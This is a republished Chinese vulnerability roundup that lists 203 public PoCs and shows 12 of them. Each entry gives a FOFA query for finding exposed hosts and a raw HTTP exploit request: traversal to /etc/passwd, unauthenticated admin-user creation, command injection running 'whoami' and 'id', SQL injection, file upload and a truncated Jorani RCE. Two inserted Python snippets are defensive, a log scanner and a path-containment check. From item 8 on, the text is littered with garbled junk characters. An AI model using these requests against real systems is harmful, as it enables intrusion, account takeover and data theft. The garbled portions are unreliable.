Roundup of publicly disclosed vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is republished from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is meant to help defenders, who can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 public, high-severity vulnerability PoCs disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few overly long PoCs are abbreviated with the placeholder PAYLOAD; search for the complete PoC yourself if you need it.

Legal: if any of this content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's back end and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version; when using it, search the page for keywords with your browser's find function (Ctrl+F).

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).
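The preamble suggests that defenders use this list for exposure checks. The Python script below is an added example and not part of the original article: it scans web-server access logs (Common Log Format; the sample lines are constructed here, not taken from any real system) for the request paths and payload fragments that recur in the PoC list further down. The item labels and the path table are ours. Before comparing paths it undoes nested percent-encoding (item 9 double-encodes its payload), drops ";matrix" suffixes and collapses ".." segments the way a servlet container does (items 14 and 15), so the evasions shown in the PoCs still match. Access logs carry no request body, so PoCs whose payload is in the body (fastjson, log4j, the SOAP SQL injection) can only be spotted by their path.

```python
"""Scan access logs for the request signatures used by the PoCs on this page.

Added example; the item numbers refer to the PoC list below. Sample log lines
are constructed for the demo and are not from any real system.
"""
from __future__ import annotations

import posixpath
import re
from urllib.parse import unquote_plus

# Request paths taken verbatim from PoC items 1-27; the labels are ours.
SUSPECT_PATHS = {
    "/mem_tracker": "StarRocks mem_tracker unauth access (1)",
    "/api/v1/userlist": "EasyCVR userlist leak (3)",
    "/api/v1/adduser": "EasyCVR adduser (4)",
    "/__debugging_center_utils___.php": "NUUO NVR debug RCE (5)",
    "/svpn_html/loadfile.php": "Sangfor NGAF loadfile read (6)",
    "/808gps/MobileAction_downLoad.action": "808gps file download (7)",
    "/eis/service/api.aspx": "Landray EIS api.aspx upload (10)",
    "/dossier/doc_fileedit_word.aspx": "Landray EIS doc_fileedit_word SQLi (11)",
    "/ioffice/prg/interface/ioFileDown.aspx": "Hongfan iOffice ioFileDown read (13)",
    "/jshERP-boot/user/getAllList": "jshERP getAllList user/password leak (14/15)",
    "/api/switch-value/list": "HFOffice switch-value SQLi (16)",
    "/portal/services/itcBulletin": "Dahua DSS itcBulletin SQLi (17)",
    "/admin/cascade_/user_edit.action": "Dahua DSS user_edit leak (18)",
    "/portal/attachment_clearTempFile.action": "Dahua DSS clearTempFile SQLi (19)",
    "/evo-apigw/evo-cirs/file/readPic": "Dahua ICC readPic file read (20)",
    "/evo-runs/v1.0/auths/sysusers/random": "Dahua ICC random fastjson (21/23)",
    "/evo-apigw/evo-brm/1.2.0/user/is-exist": "Dahua ICC is-exist log4j JNDI (22)",
    "/aim/equipmap/accept.jsp": "Yonyou NC accept.jsp upload (24)",
    "/portal/registerServlet": "Yonyou NC registerServlet JNDI (25)",
    "/portal/pt/yercommon/linkVoucher": "Yonyou NC linkVoucher SQLi (26)",
    "/ebvp/infopub/showcontent": "Yonyou NC showcontent SQLi (27)",
}

# Payload fragments shared by several PoCs, matched against the fully decoded request-target.
PAYLOAD_PATTERNS = [
    (re.compile(r"\.\.[/\\]"), "path traversal"),
    (re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I), "MySQL error-based SQLi"),
    (re.compile(r"\bwaitfor\s+delay\b", re.I), "MSSQL time-based SQLi"),
    (re.compile(r"dbms_pipe\.receive_message", re.I), "Oracle time-based SQLi"),
    (re.compile(r"\bhashbytes\s*\(", re.I), "MSSQL HASHBYTES probe"),
    (re.compile(r"\$\{jndi:", re.I), "log4j JNDI lookup"),
    (re.compile(r"\bldap://", re.I), "JNDI LDAP reference"),
]

# Common Log Format; the request-target is kept exactly as the client sent it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding; item 9 URL-encodes its payload twice."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def routing_path(target: str) -> str:
    """Path the application actually dispatches: query dropped, ';matrix' suffix
    removed from each segment and '..' collapsed. This is what turns items 14 and 15
    (getAllList;.ico and a.ico/../getAllList) back into /user/getAllList."""
    path = target.partition("?")[0]
    path = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    return posixpath.normpath(path)


def scan_line(line_no: int, line: str) -> list[tuple[int, str]]:
    """Return (line number, label) for every signature that fires on one log line."""
    match = LOG_RE.match(line)
    if not match:
        return []
    target = decode_fully(match.group("target"))
    hits = []
    label = SUSPECT_PATHS.get(routing_path(target))
    if label:
        hits.append((line_no, label))
    hits.extend((line_no, name) for pattern, name in PAYLOAD_PATTERNS if pattern.search(target))
    return hits


def scan_log(text: str) -> list[tuple[int, str]]:
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        findings.extend(scan_line(line_no, line))
    return findings


# Constructed sample log: line 4 mimics item 9 (double-encoded payload), line 5 item 26.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:08:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [10/Jun/2024:08:00:02 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.7 - - [10/Jun/2024:08:00:03 +0000] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8000
203.0.113.7 - - [10/Jun/2024:08:00:04 +0000] "GET /search/index.php?keyword=%2527%2520and%2520extractvalue(1,concat(0x7e,user()))%2523 HTTP/1.1" 500 300
203.0.113.9 - - [10/Jun/2024:08:00:05 +0000] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1" 200 10
203.0.113.9 - - [10/Jun/2024:08:00:06 +0000] "POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" 200 40
"""

if __name__ == "__main__":
    for line_no, label in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {label}")
```

Run it against your own logs by feeding the file contents to scan_log; a path hit on an endpoint you do not expose is a false positive, a path hit plus a payload hit on the same line is worth a look regardless of the response status, since several of these PoCs are blind (time-based or out-of-band).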
Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8 Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi-Anxin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform web.php (import) arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection (duplicate of entry 158 in the original list)
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical image viewer deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 全媒体 news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
PoC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 hash of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:
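Items 2, 6 and 7 above (and items 13 and 20 further down) are the same bug in different dress: a user-controlled path is joined to a document root after, at most, a string check. The Python below is an added example and not any vendor's code: naive_open models the weak pattern (a denylist on the raw string followed by a join), safe_resolve shows the containment check that stops every one of these spellings, and demo() runs the PoC paths through both against a throwaway directory that it creates itself. The helper names, the regex for URL schemes and drive letters, and the document root are assumptions of the example. Note that containment alone does not protect files that legitimately live inside the root, such as the WEB-INF/classes/config/jdbc.properties of item 7; serve only from a directory that holds nothing but public assets.

```python
"""Resolve a user-supplied file path inside a document root without letting it escape.

Added example illustrating the file-read PoCs on this page (items 2, 6, 7, 13, 20);
the helper names and the throwaway document root are ours, not any vendor's code.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Anything that looks like a URL scheme or a Windows drive ('file:', 'c:') is refused outright.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def naive_open(root: str, user_path: str) -> str | None:
    """The pattern the PoCs exploit (deliberately weak, kept for contrast):
    a string denylist on the raw value followed by a plain join."""
    if "/etc/passwd" in user_path or user_path.startswith(".."):
        return None
    # os.path.join discards root when user_path is absolute, so "/etc/./passwd"
    # (item 6) sails past the denylist and out of the root.
    return os.path.join(root, user_path)


def safe_resolve(root: str, user_path: str) -> Path | None:
    """Return the real path of user_path under root, or None if it escapes.

    The value is treated as relative no matter how it is spelled, resolved
    (following symlinks), and then required to sit inside the resolved root.
    """
    if SCHEME_RE.match(user_path):
        return None
    root_real = Path(root).resolve()
    candidate = (root_real / user_path.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(root_real)
    except ValueError:
        return None
    return candidate


PAYLOADS = [
    "index.html",                          # legitimate request
    "../../../../../../../../etc/passwd",  # item 2 (Casdoor)
    "static/../../../etc/passwd",          # item 2 spelled with a leading segment
    "/etc/./passwd",                       # item 6 (Sangfor NGAF)
    "c:/windows/win.ini",                  # item 13 (Hongfan iOffice)
    "file:/etc/passwd",                    # item 20 (Dahua ICC)
]


def demo() -> dict[str, dict[str, str | None]]:
    """Run every payload through both resolvers against a throwaway root that
    holds a single index.html; safe results are reported relative to that root."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.html").write_text("hello\n")
        root_real = Path(root).resolve()
        results = {}
        for payload in PAYLOADS:
            safe = safe_resolve(root, payload)
            results[payload] = {
                "naive": naive_open(root, payload),
                "safe": str(safe.relative_to(root_real)) if safe else None,
            }
        return results


if __name__ == "__main__":
    for payload, outcome in demo().items():
        print(f"{payload!r:40} naive={outcome['naive']!r}  safe={outcome['safe']!r}")
```

The instructive rows are "/etc/./passwd", which the denylist misses and os.path.join turns into an absolute path outside the root, while safe_resolve pins it to root/etc/passwd, and "static/../../../etc/passwd", which the startswith("..") check never sees. The same containment check belongs on the server-side destination of uploads such as the fname field of item 24.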
" o/ ~# t' [/ i" F6 \. r8. 斐讯 Phicomm 路由器RCE
9 r( C: {, Q9 V: {* nFOFA:icon_hash="-1344736688"( K6 `) g9 B1 I2 r* `; ^1 v0 q( K
默认账号admin登录后台后,执行操作/ l* u0 [/ i3 J
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 v9 Y& K; S5 I" [
Host: x.x.x.x
& N5 K3 u6 l7 \: lCookie: sysauth=第一步登录获取的cookie$ q/ x) w, O! A( X2 M: U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
* q( {1 [; |# p |# W* T- QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( l' k' O$ J3 y9 n" Q v* b2 c3 B0 T8 ]7 }# u
------WebKitFormBoundaryxbgjoytz
& Q( G" B7 D$ u# \2 v- d E, DContent-Disposition: form-data; name="wifiRebootEnablestatus"2 e4 [/ }5 I$ F+ x3 _9 q# g
& \. P. r0 D2 p I. Z7 {
%s; V# m" F1 G* x5 `2 G# g2 k
------WebKitFormBoundaryxbgjoytz/ W, O( {, P1 Y) j5 L% D. u
Content-Disposition: form-data; name="wifiRebootrange" X' s( b0 ^8 h& Q" H" H+ v/ Q
3 h. R0 X0 F. a: x12:00; id;
2 l. ^9 X* l4 `- G. E4 ? i. M% w------WebKitFormBoundaryxbgjoytz* d, [2 x: S' R
Content-Disposition: form-data; name="wifiRebootendrange"4 ^3 Z+ B8 c. x, x7 a
- R7 H! N) [) l/ z6 O: u
%s:
* I7 ?, h& g1 e+ p. J, a------WebKitFormBoundaryxbgjoytz# }4 @$ }% B" w) v) |; A7 j5 }
Content-Disposition: form-data; name="cururl2". Q5 X' Q9 G8 {' u
, P# \, l, a6 c* l" g
8 \, B, a1 i( G3 d b
------WebKitFormBoundaryxbgjoytz--
! a3 E, F R- I# C4 c/ k6 P) S$ C' n# ^
' k- l& x% m8 {! X
9. 稻壳CMS keyword 未授权SQL注入 j5 l6 U+ r8 X1 U
FOFA:app="Doccms"8 M. S* D8 _: S/ H" m4 i
GET /search/index.php?keyword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
O6 c; j% d5 [, oHost: x.x.x.x+ a0 Q# X$ W4 Z3 L; s! v
) y3 H& t8 O. x2 y* b4 _1 I5 z, `/ y6 i0 {
payload为下列语句的二次Url编码+ F$ k4 T b, a: W
' [6 W; K% [( J8 s. I- T$ |
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
$ f) J+ }/ E3 m$ d' X( h
. o$ Q5 p7 t3 c- w10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
H) |( s% T- T. X9 n# GFOFA:icon_hash="953405444". `: ? z; Q/ r3 X
+ Y, C4 m4 T: q& F/ t- J" C# }
文件上传后响应中包含上传文件的路径
; W E" c3 p9 K J4 A/ EPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ R: J e" C3 w; `3 |$ vHost: x.x.x.x:xx
) [: ~ g3 F0 z( b( MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" ]) l) Z; N+ E8 f' S% l, Y" ?5 ]; RContent-Length: 197$ t2 E4 I9 l: w/ s1 h) ~% O& c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; S5 u1 y4 Z% ^8 I9 _6 y7 O+ N, u, C8 P
Accept-Encoding: gzip, deflate
" ~9 U! F/ }- }9 e' h' K" pAccept-Language: zh-CN,zh;q=0.95 p0 u) @7 d9 K# E9 A4 |$ G
Connection: close
$ G6 T3 e$ A' }+ ^7 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu) F( b- F# ]; p! F! @
" l# { C& X% y: g4 p0 Y! _& q
------WebKitFormBoundaryxdgaqmqu2 W) K U6 X' g {- ?1 k* k/ K
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
4 v% ] U. n, FContent-Type: text/html
! O! a+ G% D# C2 m- @0 }2 W. z% C2 f6 ~( E
jmnqjfdsupxgfidopeixbgsxbf
3 a6 n7 O& a, B! V6 B+ z------WebKitFormBoundaryxdgaqmqu--
( A! ~9 S/ \/ v) q% ?+ i
; Y6 M4 }# l# ?' \4 ~( n' V, l2 r1 s& t* o/ Q" K* c- Q: T
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 E5 i3 m; Z8 E! `9 e( D3 f; RFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
1 d! M# |7 l- Y& M- U; lGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
( e4 U& V( ~7 g: y' a% QHost: 127.0.0.11 ^* ^1 D& a) Y+ o" X3 j5 f N
Pragma: no-cache8 O! A# ^2 I& X/ }7 X5 D$ p
Cache-Control: no-cache# \4 d- ]6 P d! i
Upgrade-Insecure-Requests: 1
* d* ^' P, k8 i' n' @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' d% S% y( g9 z3 d$ q/ ?5 Q; U6 q* C8 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
^2 W% M! O" S0 gAccept-Encoding: gzip, deflate
5 t- F9 [$ y, {3 SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& `* L, G1 T$ V: W; f6 J' M8 W: K
Connection: close
3 w( l- {- I, l" n, u# w' [' f3 G/ I* E
$ z6 D+ G+ Y9 [" N r6 ]$ O
12. Jorani < 1.0.2 远程命令执行( O- F/ [5 x, Q# N
FOFA:title="Jorani"3 |9 O8 ?3 R# B
第一步先拿到cookie$ u1 O8 H# ^* i
GET /session/login HTTP/1.1$ D- p3 K. P% @4 x, O
Host: 192.168.190.30
- E! {1 S! X4 }1 YUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 x6 d4 f9 R( Q; W% V9 x5 V4 G/ H- ]6 V7 E
Connection: close
7 R6 F7 D: x; C4 I5 a# G- Z3 UAccept-Encoding: gzip: H5 T$ [% y; a% k) N* U
5 U$ p: N6 r: P0 C+ V; ~
& I- k" e1 H0 j7 H" H8 u响应中csrf_cookie_jorani用于后续请求
. q' R( J6 p/ l; K( i% L$ SHTTP/1.1 200 OK# K9 n p% Y, K; A1 f" J0 { e: |
Connection: close, R* p7 z8 P6 Q6 c) U, y7 _( l3 |
Cache-Control: no-store, no-cache, must-revalidate2 S/ l8 n( m- R0 Z) u( `
Content-Type: text/html; charset=UTF-8 {) q9 ?. d1 B8 y; T* W# F% l4 ^1 a
Date: Tue, 24 Oct 2023 09:34:28 GMT
& |: z9 Z0 t5 p4 p& J: c Z, QExpires: Thu, 19 Nov 1981 08:52:00 GMT7 @& M$ W9 n' b
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT1 f9 ~/ H1 @# I b9 ]1 K& K! Q
Pragma: no-cache( q; L) ]( ]: y, S2 M6 s: C
Server: Apache/2.4.54 (Debian)
' g9 h% O5 R t; aSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/8 s4 p9 g& ?1 `! F
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
7 B1 c$ i- U! r, }5 v* g& }Vary: Accept-Encoding
/ I! l$ E# H' T2 g4 ]! y2 c1 O% v' k- F
" ?2 P: v5 F9 B6 l7 g. \POST请求,执行函数并进行base64编码' }0 R& W3 y3 G1 U9 G W
POST /session/login HTTP/1.1! q- W# X& a9 D, K. }, B1 ?0 ]
Host: 192.168.190.30
